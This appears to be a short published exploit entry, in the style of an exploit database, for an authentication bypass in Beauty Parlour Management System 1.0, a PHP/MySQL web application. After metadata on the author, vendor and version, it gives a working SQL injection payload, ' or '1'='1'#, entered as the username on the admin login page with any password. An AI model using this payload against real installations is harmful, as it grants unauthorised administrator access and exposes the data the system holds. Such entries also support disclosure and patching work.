20 lines
No EOL
684 B
Text
20 lines
No EOL
684 B
Text
# Exploit Title: Beauty Parlour Management System 1.0 - Authentication Bypass
|
|
# Google Dork: N/A
|
|
# Exploit Author: Prof. Kailas PATIL (krp)
|
|
# Date: 2020-06-18
|
|
# Vendor Homepage: https://phpgurukul.com/
|
|
# Software Link: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/
|
|
# Version: v1.0
|
|
# Category: Webapps
|
|
# Tested on: LAMP for Linux
|
|
|
|
# Description:
|
|
# Password and username parameters have sql injection vulnerability in Admin login panel.
|
|
#
|
|
#------------------------------------------------------
|
|
#
|
|
# Login Link: http://localhost/bpms/admin/index.php
|
|
# username: ' or '1'='1'#
|
|
# password: blah123
|
|
#
|
|
#------------------------------------------------------ |